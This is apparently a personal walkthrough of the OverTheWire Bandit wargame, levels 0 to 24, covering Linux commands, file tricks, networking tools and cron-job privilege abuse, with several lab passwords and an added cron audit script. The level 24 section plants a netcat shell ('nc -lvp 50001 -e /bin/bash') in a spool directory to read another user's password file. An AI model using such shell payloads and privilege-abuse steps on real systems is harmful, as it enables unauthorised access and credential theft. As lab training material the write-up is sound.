Wargames walkthrough notes - Bandit

Game link: https://overthewire.org/wargames/
In the notes below, most levels do not show the level password directly in the quoted output; where a password appears it is at the end of the text.

ssh bandit0@bandit.labs.overthewire.org -p 2220

Enter the password at the prompt to log in.

cat readme

The output is the login password for the next level.

ssh bandit1@bandit.labs.overthewire.org -p 2220

ls shows a file named "-"
Running cat - directly prints nothing.
The reason is that many Linux command options start with "-", so cat treats "-" as an option (meaning standard input) rather than a file name and waits for input.
Use the absolute path of the file, or prefix it with the current directory, to read the next level password from the file.

cat /home/bandit1/-

or

cat ./-

ssh bandit2@bandit.labs.overthewire.org -p 2220

ls shows a file named "spaces in this filename"
Copying the name straight into cat gives the following output

cat: spaces: No such file or directory
cat: in: No such file or directory
cat: this: No such file or directory
cat: filename: No such file or directory

The spaces in the file name are treated as separators between multiple file names.
Use the Tab key to complete the file name (which escapes the spaces) to get the next level password.

cat spaces\ in\ this\ filename

cat inhere/.hidden 

This gives the next level login password.

bandit4@bandit:~/inhere$ file ./-file0*
./-file00: data
./-file01: data
./-file02: data
./-file03: data
./-file04: data
./-file05: data
./-file06: data
./-file07: ASCII text
./-file08: data
./-file09: data

Only ./-file07 is text, so running cat ./-file07 in the inhere directory gives the next level password.

human-readable
1033 bytes in size
not executable

Following the hints, find is used to locate the file. Several find parameters are involved:

-type [bcdpflsD]
-size N[bcwkMG]
-size n :
The file is n units in size, where the unit suffix is:
b: 512-byte blocks
c: bytes
k: kibibytes (1024 bytes)
w: two-byte words

-type c :
The file is of type c, where c is one of:
d: directory
c: character device file
b: block device file
p: named pipe (FIFO)
f: regular file
l: symbolic link
s: socket

Search with find using the parameters above and the level hints

bandit5@bandit:~$ find inhere/ -type f -size 1033c
inhere/maybehere07/.file2

The only match is inhere/maybehere07/.file2

cat inhere/maybehere07/.file2

This gives the next level password.

owned by user bandit7
owned by group bandit6
33 bytes in size

The search criteria have to be built again; the find parameters needed here are

-size N[bcwkMG]
-user NAME
-group GROUPNAME

I didn't find the '-group' parameter in find --help, but I guessed it from '-user' and it works. Use

find / -user bandit7 -group bandit6 -size 33c

The search prints many error messages, caused by insufficient permissions on most of the filesystem. There is only one normal result, /var/lib/dpkg/info/bandit7.password, which is the file we want.

cat /var/lib/dpkg/info/bandit7.password

Get the next level password

cat data.txt |grep millionth

Get next level password

def LoadStr(url):
    # Read the file and return one entry per line
    with open(url) as text:
        key = text.read().splitlines()
    return key

def CompareKey(content):
    # count[i] = number of lines identical to line i (including itself)
    count = [0] * len(content)
    for i in range(len(content)):
        for j in range(len(content)):
            if content[i] == content[j]:
                count[i] = count[i] + 1
    return count

if __name__ == "__main__":
    key_url = "/Users/zhaohg/Downloads/str_key.txt"
    key_content = LoadStr(key_url)
    key_count = CompareKey(key_content)
    # The line that occurs exactly once is the password
    for i in range(len(key_count)):
        if key_count[i] == 1:
            print(key_content[i])

The script is very rough... Output after running it:

UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR

strings data.txt |grep ==

You can see the next level password

import base64
str_b64 = 'VGhlIHBhc3N3b3JkIGlzIElGdWt3S0dzRlc4TU9xM0lSRnFyeEUxaHhUTkViVVBSCg=='

str_decode = base64.b64decode(str_b64)
print(str_decode)

Running this gives the next level password.

cat data.txt |tr a-zA-Z n-za-mN-ZA-M

Execute to get the next level password

ssh bandit14@localhost -i sshkey.private

Then read the bandit14 password from the file location given in the level description

bandit14@bandit:~$ cat /etc/bandit_pass/bandit14 

bandit14@bandit:~$ nc localhost 30000
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Correct!

The line printed after Correct! is the next level password

bandit15@bandit:~$ ncat --ssl localhost 30001
BfMYroe26WYalil77FoDi9qh59eK5xNr
Correct!

Likewise, the line printed after Correct! is the next level password

bandit16@bandit:~$ nmap localhost -p 31000-32000

Starting Nmap 7.40 ( https://nmap.org ) at 2022-02-08 08:37 CET
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00022s latency).
Not shown: 996 closed ports
PORT      STATE SERVICE
31046/tcp open  unknown
31518/tcp open  unknown
31691/tcp open  unknown
31790/tcp open  unknown
31960/tcp open  unknown

There are not many, so try them one by one with the same method as the previous level

bandit16@bandit:~$ ncat --ssl localhost 31790
cluFn7wTiGryunymYOu4RcffSxQluehd
Correct!

Finally a private key is returned; this is the SSH login key for the next level user

ssh bandit17@bandit.labs.overthewire.org -p 2220 -i privatekey 

The login fails with the following error message

Permissions 0644 for 'privatekey' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "privatekey": bad permissions

The key is ignored because its permissions are too open. Change the private key's permissions to 400 and the login works.
After logging in there are two password files. According to the hints, the next level user's password is the line that differs between the new and old files, so use the diff command to compare them

bandit17@bandit:~$ diff passwords.new passwords.old 
42c42
< kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd
---
> w0Yfolrc5bwjS4qw5mq1nnQi6mF03bii

This directly gives the password of the next level user.
Since we logged in with the private key, the earlier pattern applies: as bandit17 we can also read this user's own password from /etc/bandit_pass for convenience

bandit17@bandit:~$ cat /etc/bandit_pass/bandit17
xLYVMN9WE5zQ5vHacb0sZEVqbrp7nBTn

root@Zhaohg-Server:~# scp -P 2220 bandit18@bandit.labs.overthewire.org:~/readme ~/
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit18@bandit.labs.overthewire.org's password: 
readme                                                                                                         100%   33     0.2KB/s   00:00    

The password is obtained by viewing the readme file locally

bandit19@bandit:~$ ./bandit20-do id
uid=11019(bandit19) gid=11019(bandit19) euid=11020(bandit20) groups=11019(bandit19)

This command can be used to cat the next level user's password directly

./bandit20-do cat /etc/bandit_pass/bandit20

nc -l localhost -p 50001

Then run the provided suconnect program in a second connection

./suconnect 50001

Now go back to the nc connection, enter the bandit20 password, and the next level password is returned

Output of the nc connection:
bandit20@bandit:~$ nc -l localhost -p 50001
GbKksEFF4yrVs6il55v6gwY5aVje5f0j
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

Output of the suconnect connection:
bandit20@bandit:~$ ./suconnect 50001
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password

bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null

This gives the path of the script being executed. Check the contents of that .sh file

bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh 
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

The cron job writes the bandit22 password into /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv and changes its permissions so that all users can read the file.
Get the password directly with cat

 cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

bandit22@bandit:~$ cat /etc/cron.d/cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null

Then view the script that the scheduled task executes

bandit22@bandit:~$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget

The key point is that once you know the value of 'mytarget', you can read the bandit23 password. Since 'myname' is known to be 'bandit23', 'mytarget' can be computed locally

root@Zhaohg-Server:~# mytarget=$(echo I am user bandit23 | md5sum | cut -d ' ' -f 1)
root@Zhaohg-Server:~# echo $mytarget
8ca319486bfbbc3663ea0fbe81326349

Then cat the file at the corresponding path from the script

cat /tmp/8ca319486bfbbc3663ea0fbe81326349

bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

The bandit24 spool directory is writable and executable by others, and files in it owned by bandit23 are executed by the scheduled task

bandit23@bandit:~$ ls -l /var/spool/
total 12
drwxrwx-wx 83 root bandit24 4096 Feb  8 10:02 bandit24

The idea is to have bandit23 place an executable file in this directory; the scheduled task then runs it with bandit24's permissions, so it can cat /etc/bandit_pass/bandit24.
I tried to redirect the cat output directly into the bandit23 directory, but the permissions were not enough, so I used a reverse shell.
First upload the nc reverse shell script to the /var/spool/bandit24/ directory.
Script content:

#! /bin/bash
nc -lvp 50001 -e /bin/bash

Upload command:

root@Zhaohg-Server:~# scp -P 2220 /root/catkey.sh bandit23@bandit.labs.overthewire.org:/var/spool/bandit24/catkey.sh 
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit23@bandit.labs.overthewire.org's password: 
catkey.sh                                                                                                     100%   42     0.2KB/s   00:00    

Then, as bandit23, set the permissions of catkey.sh to 777

chmod 777  /var/spool/bandit24/catkey.sh

Wait a moment, then connect with nc to port 50001, where the reverse shell is listening

nc localhost 50001

The shell now has bandit24's permissions, so the password can be read

id
uid=11024(bandit24) gid=11024(bandit24) groups=11024(bandit24)

cat /etc/bandit_pass/bandit24
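The weakness behind the last three levels is a cron job that runs as one user but reads from, writes to, or executes in a location that another user can write to. As an added example (not part of the original notes), the sh script below audits a cron.d file for exactly that: it checks each job's script and every absolute path the script references for group/other write bits, resolving $myname to the cron user as the page's scripts do. The demo() tree, file names and paths are constructed, and GNU stat is assumed.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit a cron.d file for a job
# that runs as one user but executes or reads files from a path other users can
# write to. Assumes GNU stat and cron.d format (m h dom mon dow user command, or
# @reboot user command); $myname in a script stands for the cron user, as in the
# page's scripts. Everything demo() creates is constructed.

# Print LOOSE <path> when the group or other write bit is set on an existing path.
flag_if_loose() {
    [ -e "$1" ] || return 0
    mode=$(stat -c %a "$1")
    case $mode in
        *[2367]?|*[2367]) echo "LOOSE $1 mode=$mode owner=$(stat -c %U "$1")" ;;
    esac
}

# For every job: check the script itself, then every absolute path it mentions
# (after substituting the cron user for $myname / ${myname}).
audit_cron_file() {
    cronfile=$1
    set -f    # cron lines contain '*'; do not let the shell glob them
    while IFS= read -r line; do
        case $line in
            ''|'#'*) continue ;;
            '@'*) set -- $line; user=$2; script=$3 ;;
            *)    set -- $line; user=$6; script=$7 ;;
        esac
        [ -f "$script" ] || { echo "MISSING $script (user $user)"; continue; }
        flag_if_loose "$script"
        sed 's/\$myname/'"$user"'/g; s/\${myname}/'"$user"'/g' "$script" |
            grep -oE '(^|[^A-Za-z0-9_./-])/[A-Za-z0-9_./-]+' | sed 's|^[^/]||' | sort -u |
            while read -r p; do flag_if_loose "$p"; done
    done < "$cronfile"
    set +f
}

# Constructed demo mirroring the page: a cron entry for bandit24 whose script runs
# everything in a drwxrwx-wx spool directory. Prints the audit findings.
demo() {
    d=$(mktemp -d)
    mkdir -p "$d/spool/bandit24"
    chmod 773 "$d/spool/bandit24"
    printf '#!/bin/bash\nmyname=$(whoami)\ncd %s/spool/$myname\nfor i in *; do ./$i; done\n' \
        "$d" > "$d/cronjob_bandit24.sh"
    chmod 755 "$d/cronjob_bandit24.sh"
    printf '* * * * * bandit24 %s/cronjob_bandit24.sh\n' "$d" > "$d/cronjob_bandit24"
    audit_cron_file "$d/cronjob_bandit24"
    rm -rf "$d"
}
```

Run audit_cron_file against a real /etc/cron.d entry to check it; demo shows the expected LOOSE finding on the constructed spool directory.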

Keywords: Linux server security

Added by Iceman512 on Tue, 08 Feb 2022 17:18:16 +0200